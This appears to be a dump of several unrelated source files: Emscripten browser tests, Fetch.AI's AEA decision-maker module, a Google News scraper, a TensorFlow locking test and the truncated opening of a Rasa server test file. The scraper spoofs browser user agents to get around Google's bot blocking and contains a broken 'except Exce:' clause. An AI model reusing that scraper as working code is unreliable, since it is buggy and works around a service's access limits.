self.btest(test_file('wasm_worker/cancel_all_wait_asyncs.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs_at_address() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs_at_address(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs_at_address.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_init(), emscripten_lock_waitinf_acquire() and emscripten_lock_release()
@also_with_minimal_runtime
def test_wasm_worker_lock_waitinf(self):
self.btest(test_file('wasm_worker/lock_waitinf_acquire.c'), expected='4000', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() and emscripten_lock_try_acquire() in Worker.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait(self):
self.btest(test_file('wasm_worker/lock_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() between two Wasm Workers.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait2(self):
self.btest(test_file('wasm_worker/lock_wait_acquire2.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_async_acquire() function.
@also_with_minimal_runtime
def test_wasm_worker_lock_async_acquire(self):
self.btest(test_file('wasm_worker/lock_async_acquire.c'), expected='0', args=['--closure=1', '-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_wait_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_wait(self):
self.btest(test_file('wasm_worker/lock_busyspin_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_waitinf_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_waitinf(self):
self.btest(test_file('wasm_worker/lock_busyspin_waitinf_acquire.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests that proxied JS functions cannot be called from Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_no_proxied_js_functions(self):
self.btest(test_file('wasm_worker/no_proxied_js_functions.c'), expected='0',
args=['--js-library', test_file('wasm_worker/no_proxied_js_functions.js'), '-sWASM_WORKERS', '-sASSERTIONS'])
# Tests emscripten_semaphore_init(), emscripten_semaphore_waitinf_acquire() and emscripten_semaphore_release()
@also_with_minimal_runtime
def test_wasm_worker_semaphore_waitinf_acquire(self):
self.btest(test_file('wasm_worker/semaphore_waitinf_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_semaphore_try_acquire() on the main thread
@also_with_minimal_runtime
def test_wasm_worker_semaphore_try_acquire(self):
self.btest(test_file('wasm_worker/semaphore_try_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp')
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-sMALLOC=emmalloc', '-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest_exit(test_file('alloc_3gb.cpp'),
args=['-sMAXIMUM_MEMORY=4GB', '-sALLOW_MEMORY_GROWTH=1'] + args)
test(['-sMALLOC=emmalloc'])
test(['-sMALLOC=emmalloc-debug'])
test(['-sMALLOC=emmalloc-memvalidate'])
test(['-sMALLOC=emmalloc-memvalidate-verbose'])
@parameterized({
# the fetch backend works even on the main thread: we proxy to a background
# thread and busy-wait
'main_thread': (['-sPTHREAD_POOL_SIZE=4'],),
# using proxy_to_pthread also works, of course
'proxy_to_pthread': (['-sPROXY_TO_PTHREAD', '-sINITIAL_MEMORY=32MB', '-DPROXYING'],),
})
@requires_threads
def test_wasmfs_fetch_backend(self, args):
if is_firefox() and '-sPROXY_TO_PTHREAD' not in args:
return self.skipTest('ff hangs on the main_thread version. browser bug?')
create_file('data.dat', 'hello, fetch')
create_file('test.txt', 'fetch 2')
try_delete('subdir')
ensure_dir('subdir')
create_file('subdir/backendfile', 'file 1')
create_file('subdir/backendfile2', 'file 2')
self.btest_exit(test_file('wasmfs/wasmfs_fetch.c'),
args=['-sWASMFS', '-sUSE_PTHREADS', '--js-library', test_file('wasmfs/wasmfs_fetch.js')] + args)
@requires_threads
@no_firefox('no OPFS support yet')
def test_wasmfs_opfs(self):
test = test_file('wasmfs/wasmfs_opfs.c')
args = ['-sWASMFS', '-pthread', '-sPROXY_TO_PTHREAD', '-O3']
self.btest_exit(test, args=args + ['-DWASMFS_SETUP'])
self.btest_exit(test, args=args + ['-DWASMFS_RESUME'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-sMALLOC=emmalloc', '-sALLOW_MEMORY_GROWTH=1', '-sABORTING_MALLOC=0', '-sASSERTIONS=2', '-sMINIMAL_RUNTIME=1', '-sMAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp')
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB', '-sABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp')
# Tests that Emscripten-compiled applications can be run when a slash in the URL query or fragment of the js file
def test_browser_run_with_slash_in_query_and_hash(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0'])
src = open('test.html').read()
# Slash in query
create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail'))
self.run_browser('test-query.html', None, '/report_result?0')
# Slash in fragment
create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail'))
self.run_browser('test-hash.html', None, '/report_result?0')
# Slash in query and fragment
create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail'))
self.run_browser('test-query-hash.html', None, '/report_result?0')
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-sASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'),
args=['-sUSE_PTHREADS', '-O2', '-sPROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
def test_full_js_library_strict(self):
self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS'])
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941'],
args_base + ['--dump_out_directory', 'other dir/multiple', '--port', '6942']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
dump_dir = 'other dir/multiple' if '--dump_out_directory' in args else 'dump_out'
self.assertExists(self.in_dir(f'{dump_dir}/test.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/heap.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/nested/with space.dat'))
stdout = read_file(self.in_dir('stdout.txt'))
stderr = read_file(self.in_dir('stderr.txt'))
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
base.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the decision maker class."""
import hashlib
import threading
from abc import ABC, abstractmethod
from queue import Queue
from threading import Thread
from types import SimpleNamespace
from typing import Any, Dict, List, Optional
from uuid import uuid4
from aea.crypto.wallet import Wallet
from aea.helpers.async_friendly_queue import AsyncFriendlyQueue
from aea.helpers.logging import WithLogger, get_logger
from aea.helpers.transaction.base import Terms
from aea.identity.base import Identity
from aea.protocols.base import Message
def _hash(access_code: str) -> str:
"""
Get the hash of the access code.
:param access_code: the access code
:return: the hash
"""
result = hashlib.sha224(access_code.encode("utf-8")).hexdigest()
return result
class OwnershipState(ABC):
"""Represent the ownership state of an agent (can proxy a ledger)."""
@abstractmethod
def set(self, **kwargs: Any) -> None:
"""
Set values on the ownership state.
:param kwargs: the relevant keyword arguments
"""
@abstractmethod
def apply_delta(self, **kwargs: Any) -> None:
"""
Apply a state update to the ownership state.
This method is used to apply a raw state update without a transaction.
:param kwargs: the relevant keyword arguments
"""
@property
@abstractmethod
def is_initialized(self) -> bool:
"""Get the initialization status."""
@abstractmethod
def is_affordable_transaction(self, terms: Terms) -> bool:
"""
Check if the transaction is affordable (and consistent).
:param terms: the transaction terms
:return: True if the transaction is legal wrt the current state, false otherwise.
"""
@abstractmethod
def apply_transactions(self, list_of_terms: List[Terms]) -> "OwnershipState":
"""
Apply a list of transactions to (a copy of) the current state.
:param list_of_terms: the sequence of transaction terms.
:return: the final state.
"""
@abstractmethod
def __copy__(self) -> "OwnershipState":
"""Copy the object."""
class Preferences(ABC):
"""Class to represent the preferences."""
@abstractmethod
def set(self, **kwargs: Any) -> None:
"""
Set values on the preferences.
:param kwargs: the relevant key word arguments
"""
@property
@abstractmethod
def is_initialized(self) -> bool:
"""
Get the initialization status.
Returns True if exchange_params_by_currency_id and utility_params_by_good_id are not None.
"""
@abstractmethod
def marginal_utility(self, ownership_state: OwnershipState, **kwargs: Any) -> float:
"""
Compute the marginal utility.
:param ownership_state: the ownership state against which to compute the marginal utility.
:param kwargs: optional keyword arguments
:return: the marginal utility score
"""
@abstractmethod
def utility_diff_from_transaction(
self, ownership_state: OwnershipState, terms: Terms
) -> float:
"""
Simulate a transaction and get the resulting utility difference (taking into account the fee).
:param ownership_state: the ownership state against which to apply the transaction.
:param terms: the transaction terms.
:return: the score.
"""
@abstractmethod
def __copy__(self) -> "Preferences":
"""Copy the object."""
class ProtectedQueue(Queue):
"""A wrapper of a queue to protect which object can read from it."""
def __init__(self, access_code: str) -> None:
"""
Initialize the protected queue.
:param access_code: the access code to read from the queue
"""
super().__init__()
self._access_code_hash = _hash(access_code)
def put( # pylint: disable=arguments-differ
self,
internal_message: Optional[Message],
block: bool = True,
timeout: Optional[float] = None,
) -> None:
"""
Put an internal message on the queue.
If optional args block is true and timeout is None (the default),
block if necessary until a free slot is available. If timeout is
a positive number, it blocks at most timeout seconds and raises
the Full exception if no free slot was available within that time.
Otherwise (block is false), put an item on the queue if a free slot
is immediately available, else raise the Full exception (timeout is
ignored in that case).
:param internal_message: the internal message to put on the queue
:param block: whether to block or not
:param timeout: timeout on block
:raises: ValueError, if the item is not an internal message
"""
if not (isinstance(internal_message, Message) or internal_message is None):
raise ValueError("Only messages are allowed!")
super().put(internal_message, block=True, timeout=None)
def put_nowait( # pylint: disable=arguments-differ
self, internal_message: Optional[Message]
) -> None:
"""
Put an internal message on the queue.
Equivalent to put(item, False).
:param internal_message: the internal message to put on the queue
:raises: ValueError, if the item is not an internal message
"""
if not (isinstance(internal_message, Message) or internal_message is None):
raise ValueError("Only messages are allowed!")
super().put_nowait(internal_message)
def get(self, block: bool = True, timeout: Optional[float] = None) -> None:
"""
Inaccessible get method.
:param block: whether to block or not
:param timeout: timeout on block
:raises: ValueError, access not permitted.
"""
raise ValueError("Access not permitted!")
def get_nowait(self) -> None:
"""
Inaccessible get_nowait method.
:raises: ValueError, access not permitted.
"""
raise ValueError("Access not permitted!")
def protected_get(
self, access_code: str, block: bool = True, timeout: Optional[float] = None
) -> Optional[Message]:
"""
Access protected get method.
:param access_code: the access code
:param block: If optional args block is true and timeout is None (the default), block if necessary until an item is available.
:param timeout: If timeout is a positive number, it blocks at most timeout seconds and raises the Empty exception if no item was available within that time.
:raises: ValueError, if caller is not permitted
:return: internal message
"""
if self._access_code_hash != _hash(access_code):
raise ValueError("Wrong code, access not permitted!")
internal_message = super().get(
block=block, timeout=timeout
) # type: Optional[Message]
return internal_message
class DecisionMakerHandler(WithLogger, ABC):
"""This class implements the decision maker."""
__slots__ = ("_identity", "_wallet", "_config", "_context", "_message_out_queue")
self_address: str = "decision_maker"
def __init__(
self, identity: Identity, wallet: Wallet, config: Dict[str, Any], **kwargs: Any
) -> None:
"""
Initialize the decision maker handler.
:param identity: the identity
:param wallet: the wallet
:param config: the user defined configuration of the handler
:param kwargs: the key word arguments
"""
logger = get_logger(__name__, identity.name)
WithLogger.__init__(self, logger=logger)
self._identity = identity
self._wallet = wallet
self._config = config
self._context = SimpleNamespace(**kwargs)
self._message_out_queue = AsyncFriendlyQueue() # type: AsyncFriendlyQueue
@property
def agent_name(self) -> str:
"""Get the agent name."""
return self.identity.name
@property
def identity(self) -> Identity:
"""Get identity of the agent."""
return self._identity
@property
def wallet(self) -> Wallet:
"""Get wallet of the agent."""
return self._wallet
@property
def config(self) -> Dict[str, Any]:
"""Get user defined configuration"""
return self._config
@property
def context(self) -> SimpleNamespace:
"""Get the context."""
return self._context
@property
def message_out_queue(self) -> AsyncFriendlyQueue:
"""Get (out) queue."""
return self._message_out_queue
@abstractmethod
def handle(self, message: Message) -> None:
"""
Handle an internal message from the skills.
:param message: the internal message
"""
class DecisionMaker(WithLogger):
"""This class implements the decision maker."""
__slots__ = (
"_queue_access_code",
"_message_in_queue",
"_decision_maker_handler",
"_thread",
"_lock",
"_message_out_queue",
"_stopped",
)
def __init__(self, decision_maker_handler: DecisionMakerHandler,) -> None:
"""
Initialize the decision maker.
:param decision_maker_handler: the decision maker handler
"""
WithLogger.__init__(self, logger=decision_maker_handler.logger)
self._queue_access_code = uuid4().hex
self._message_in_queue = ProtectedQueue(
self._queue_access_code
) # type: ProtectedQueue
self._decision_maker_handler = decision_maker_handler
self._thread = None # type: Optional[Thread]
self._lock = threading.Lock()
self._message_out_queue = decision_maker_handler.message_out_queue
self._stopped = True
@property
def agent_name(self) -> str:
"""Get the agent name."""
return self.decision_maker_handler.identity.name
@property
def message_in_queue(self) -> ProtectedQueue:
"""Get (in) queue."""
return self._message_in_queue
@property
def message_out_queue(self) -> AsyncFriendlyQueue:
"""Get (out) queue."""
return self._message_out_queue
@property
def decision_maker_handler(self) -> DecisionMakerHandler:
"""Get the decision maker handler."""
return self._decision_maker_handler
def start(self) -> None:
"""Start the decision maker."""
with self._lock:
if not self._stopped: # pragma: no cover
self.logger.debug(
"[{}]: Decision maker already started.".format(self.agent_name)
)
return
self._stopped = False
self._thread = Thread(target=self.execute, name=self.__class__.__name__)
self._thread.start()
def stop(self) -> None:
"""Stop the decision maker."""
with self._lock:
self._stopped = True
self.message_in_queue.put(None)
if self._thread is not None:
self._thread.join()
self.logger.debug("[{}]: Decision Maker stopped.".format(self.agent_name))
self._thread = None
def execute(self) -> None:
"""
Execute the decision maker.
Performs the following while not stopped:
- gets internal messages from the in queue and calls handle() on them
"""
while not self._stopped:
message = self.message_in_queue.protected_get(
self._queue_access_code, block=True
) # type: Optional[Message]
if message is None:
self.logger.debug(
"[{}]: Received empty message. Quitting the processing loop...".format(
self.agent_name
)
)
continue
self.handle(message)
def handle(self, message: Message) -> None:
"""
Handle an internal message from the skills.
:param message: the internal message
"""
self.decision_maker_handler.handle(message)
|
core.py
|
from __future__ import print_function
import errno
import logging
import os
import pickle
import random
import re
import time
import requests
from bs4 import BeautifulSoup
import json
from fake_useragent import UserAgent
from newspaper import Article
import threading
from datetime import datetime, timedelta
from dateutil import parser
from queue import Queue
from urllib.parse import quote
import urllib.request
from unidecode import unidecode
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT = 0
GOOGLE_NEWS_URL = 'https://www.google.com.my/search?q={}&source=lnt&tbs=cdr%3A1%2Ccd_min%3A{}%2Ccd_max%3A{}&tbm=nws&start={}'
logging.basicConfig(
level = logging.DEBUG, format = '%(asctime)s - %(levelname)s - %(message)s'
)
def get_date(load):
try:
date = re.findall(
'[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?', load
)
return '%s-%s-%s' % (date[2], date[0], date[1])
except Exce:
return False
def run_parallel_in_threads(target, args_list):
globalparas = []
result = Queue()
def task_wrapper(*args):
result.put(target(*args))
threads = [
threading.Thread(target = task_wrapper, args = args)
for args in args_list
]
for t in threads:
t.start()
for t in threads:
t.join()
while not result.empty():
globalparas.append(result.get())
globalparas = list(filter(None, globalparas))
return globalparas
def forge_url(q, start, year_start, year_end):
global NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT += 1
return GOOGLE_NEWS_URL.format(
q.replace(' ', '+'), str(year_start), str(year_end), start
)
def extract_links(content):
soup = BeautifulSoup(content, 'html.parser') # _sQb top _vQb _mnc
today = datetime.now().strftime('%m/%d/%Y')
links_list = [
v.attrs['href'] for v in soup.find_all('a', {'class': ['lLrAF']})
]
dates_list = [v.text for v in soup.find_all('div', {'class': ['slp']})]
print(dates_list)
output = []
for (link, date) in zip(links_list, dates_list):
try:
date = date.split('-')
if (
date[1].find('hour') >= 0
or date[1].find('minute') >= 0
or date[1].find('分鐘') >= 0
or date[1].find('小時') >= 0
):
date[1] = today
elif date[1].find('day') >= 0 or date[1].find('日') >= 0:
count = date[1].split(' ')[0]
else:
try:
date[1] = parser.parse(date[1]).strftime('%m-%d-%Y')
except:
date[1] = 'null'
output.append((link, date[0].strip(), date[1]))
except:
continue
return output
def get_article(link, news, date):
article = Article(link)
article.download()
article.parse()
article.nlp()
lang = 'eng'
if len(article.title) < 5 or len(article.text) < 5:
print('found BM/ID article')
article = Article(link, language = 'id')
article.download()
article.parse()
article.nlp()
lang = 'id'
return {
'title': article.title,
'url': link,
'authors': article.authors,
'top-image': article.top_image,
'text': article.text,
'keyword': article.keywords,
'summary': article.summary,
'news': news,
'date': date,
'language': lang,
}
def google_news_run(
keyword,
limit = 10,
year_start = 2010,
year_end = 2011,
debug = True,
sleep_time_every_ten_articles = 0,
):
num_articles_index = 0
ua = UserAgent()
results = []
while num_articles_index < limit:
url = forge_url(keyword, num_articles_index, year_start, year_end)
if debug:
logging.debug('For Google -> {}'.format(url))
logging.debug(
'Total number of calls to Google = {}'.format(
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT
)
)
headers = {'User-Agent': ua.chrome}
success = False
try:
response = requests.get(url, headers = headers, timeout = 60)
if (
str(response.content).find(
'In the meantime, solving the above CAPTCHA will let you continue to use our services'
)
>= 0
):
print('whops, blocked')
return results
links = extract_links(response.content)
nb_links = len(links)
if nb_links == 0 and num_articles_index == 0:
print(
'No results fetched. Either the keyword is wrong or you have been banned from Google. Retry tomorrow or change of IP Address.'
)
return results
if nb_links == 0:
print('No more news to read for keyword {}.'.format(keyword))
return results
results += run_parallel_in_threads(get_article, links)
success = True
except requests.exceptions.Timeout:
logging.debug(
'Google news TimeOut. Maybe the connection is too slow. Skipping.'
)
continue
num_articles_index += 10
if debug and sleep_time_every_ten_articles != 0:
logging.debug(
'Program is going to sleep for {} seconds.'.format(
sleep_time_every_ten_articles
)
)
time.sleep(sleep_time_every_ten_articles)
return results
|
dense_update_ops_no_tsan_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
# NOTE(mrry): We exclude thess tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(array_ops.zeros([1024, 1024]))
adds = [
state_ops.assign_add(
p, ones_t, use_locking=False) for _ in range(20)
]
variables.global_variables_initializer().run()
def run_add(add_op):
sess.run(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], float(1))
p = variables.Variable(array_ops.zeros([1024, 1024]))
assigns = [
state_ops.assign(p, math_ops.multiply(ones_t, float(i)), False)
for i in range(1, 21)
]
variables.global_variables_initializer().run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
# NOTE(skyewm): We exclude these tests from the TSAN TAP target, because they
# contain non-benign but known data races between the variable assignment and
# returning the output tensors. This issue will be resolved with the new
# resource variables.
def testParallelUpdateWithLocking(self):
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
adds = [
state_ops.assign_add(
p, ones_t, use_locking=True) for _ in range(20)
]
p.initializer.run()
def run_add(add_op):
sess.run(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertAllEqual(vals, ones * 20)
def testParallelAssignWithLocking(self):
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
assigns = [
state_ops.assign(
p, math_ops.multiply(ones_t, float(i)), use_locking=True)
for i in range(1, 21)
]
p.initializer.run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is the same, and taken from one of the assignments.
self.assertTrue(vals[0, 0] > 0)
self.assertTrue(vals[0, 0] <= 20)
self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
if __name__ == "__main__":
test.main()
|
test_server.py
|
import os
from multiprocessing.managers import DictProxy
import requests
import time
import tempfile
import uuid
from typing import List, Text, Type, Generator, NoReturn
from contextlib import ExitStack
from _pytest import pathlib
from aioresponses import aioresponses
import pytest
from freezegun import freeze_time
from mock import MagicMock
from multiprocessing import Process, Manager
import rasa
import rasa.constants
import rasa.utils.io
from rasa.core import events, utils
from rasa.core.agent import Agent
from rasa.core.channels import CollectingOutputChannel, RestInput, SlackInput
from rasa.core.channels.slack import SlackBot
from rasa.core.events import Event, UserUttered, SlotSet, BotUttered
from rasa.core.trackers import DialogueStateTracker
from rasa.model import unpack_model
from rasa.utils.endpoints import EndpointConfig
from sanic import Sanic
from sanic.testing import SanicTestClient
from tests.nlu.utilities import ResponseTest
from tests.conftest import get_test_client
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, "name": "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_without_api)
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_server)
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_nlu_server)
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_core_server)
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_secured)
def test_root(rasa_app: SanicTestClient):
_, response = rasa_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_without_enable_api(rasa_app_without_api: SanicTestClient):
_, response = rasa_app_without_api.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/")
